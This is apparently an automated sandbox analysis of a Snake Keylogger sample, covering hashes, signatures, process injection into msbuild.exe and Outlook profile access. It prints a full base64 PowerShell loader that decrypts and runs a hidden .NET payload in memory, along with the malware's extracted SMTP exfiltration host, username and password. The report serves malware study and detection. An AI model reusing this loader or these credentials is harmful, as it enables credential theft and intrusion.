Analysis
-
max time kernel
136s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 01:17
Static task
static1
Behavioral task
behavioral1
Sample
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
Resource
win10v2004-20240426-en
General
-
Target
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
-
Size
30.7MB
-
MD5
beec77b6b798c503ecf2284fa6026078
-
SHA1
85bae44e72a7b65820b0fff7fdfefa285fb2f7cd
-
SHA256
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
-
SHA512
8db23bff39a52ac9f956397ceb71e1e313bcd228a24faf4a17760a768e8895f94a170704748f8a7546da63a650e69747c66d84c6a11dfd1908ba9d743b3266be
-
SSDEEP
393216:dQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mga96l+ZArYsFRl7D:d3on1HvSzxAMNaFZArYsf
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.gbogboro.com - Port:
587 - Username:
[email protected] - Password:
Egoamaka@123
https://scratchdreams.tk
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables packed with or use KoiVM 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3932-32-0x0000019031DB0000-0x0000019031E2A000-memory.dmp INDICATOR_EXE_Packed_KoiVM -
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables with potential process hoocking 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DotNetProcHook -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msbuild.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msbuild.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msbuild.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msbuild.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 31 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3932 set thread context of 2896 3932 powershell.exe msbuild.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exemsbuild.exepid process 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 3932 powershell.exe 2896 msbuild.exe 2896 msbuild.exe 2896 msbuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exemsbuild.exedescription pid process Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 2896 msbuild.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.execmd.exepowershell.execsc.exedescription pid process target process PID 228 wrote to memory of 3996 228 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe cmd.exe PID 228 wrote to memory of 3996 228 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe cmd.exe PID 3996 wrote to memory of 3932 3996 cmd.exe powershell.exe PID 3996 wrote to memory of 3932 3996 cmd.exe powershell.exe PID 3932 wrote to memory of 1912 3932 powershell.exe csc.exe PID 3932 wrote to memory of 1912 3932 powershell.exe csc.exe PID 1912 wrote to memory of 5072 1912 csc.exe cvtres.exe PID 1912 wrote to memory of 5072 1912 csc.exe cvtres.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 2896 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 3392 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 3392 3932 powershell.exe msbuild.exe PID 3932 wrote to memory of 3392 3932 powershell.exe msbuild.exe -
outlook_office_path 1 IoCs
Processes:
msbuild.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msbuild.exe -
outlook_win_path 1 IoCs
Processes:
msbuild.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msbuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGoAbQBkADgAOAB2AHkAaQBwAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA=="2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGoAbQBkADgAOAB2AHkAaQBwAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA==3⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CD5.tmp" "c:\Users\Admin\AppData\Local\Temp\ha2fknko\CSC89ACB1CE5D8B40638E6CFC2FB9D17C36.TMP"5⤵PID:5072
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵PID:3392
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f69b126321b2461b146fcbb4e7b909e8
SHA1811bb1f45085e6e6d9ed54719a6de5cda27cdd64
SHA256892dccac2e71472da160254e15c11e949f2f3fbc9c46578df8873a5707b7c3fc
SHA512e1dccd0b3b3434de28e0d1cfe8c4dd6f791dd600bcc9f8ada49be97c317ff43ebfa5f760459eeae3687278bdf009b8fc8f1e379aeff3007347c7b0e27a764ded
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
20KB
MD5fec0ee7beb18cfe6da97e99a57898163
SHA1f9bfefcfe79858383586541d2ec250e0060fc42c
SHA256301f949a952c4705d69f2d7fcaf13e7055542142d249f7e57793c3548f1c56f7
SHA5122a263c00c95654c7b0ab784f372d59183bf21132ddf4a39a4935cf17a98e1b760fc26ed217c415d1ddeeac8595477e1503fd917d8b878771da7a9501c3c29362
-
Filesize
3KB
MD5107bbe27554d1bdd9f9f4e1475153cc4
SHA1b7163ef0d7cd1c217c2614d264fa822450cb0d20
SHA25641518603317cdae8e4bba16527224e3c2f5ae6210003b384929d4e24441f58b1
SHA5125e53e487139c8b11cfd710851c5c862914c87d741c298d48c1d3d2e64f2b4de9b0381eeed9ff78bc9c99803e9dc3feddc60340fe5aa4201775da57a4398e5f7c
-
Filesize
652B
MD54347b0508841d3e260f5ee7bd425e02c
SHA1d39c6a1dae168d2bd576c2adce0d3cb44b05c900
SHA256e84257f8590c0f3c83ce20aaa934212b7c7d26db549f66b7fb9f965fee67a428
SHA512195a2ba2783364611e6356f9f8d6c5e8f8d39e7965c2af286841be5bd4426fd1d79bf38f35fe8165e105ef77256f74ed72ce792fce641fa14bca786789af3ec4
-
Filesize
479B
MD52d582d49bc5da0270e19e27903336497
SHA101065a81afc9e4ec356ef1998ec15535f7ea5d09
SHA2561104ec9aaa6d72466e966359f4e147da4a11ac8ba4c1d36f45fdf83ee76e16dc
SHA51203ef2d744cc6152d5723574d34bf06c5bd65264999e8eade3e48159367fb05067cd071ee37225947ff4b9286d0f11b6963e2d42a1e9c26a3ffc47b76bbf3a5e6
-
Filesize
369B
MD533b777cbde458906aef2afc3416ec74a
SHA1632fe15f52269595f5c1089ec14d13d9eb5dda33
SHA2565829454223d3bcb85c080953a2064d1389a6be87fba20117e5eb072028aad009
SHA512102ce199453dbb77d07c31e721ccaf95ddbdbc1e8ca13697218206661fba3cf3c4983d46ffa591047d37f22f8f9111aa71d3796dce88391ae1d4a340b54e0e29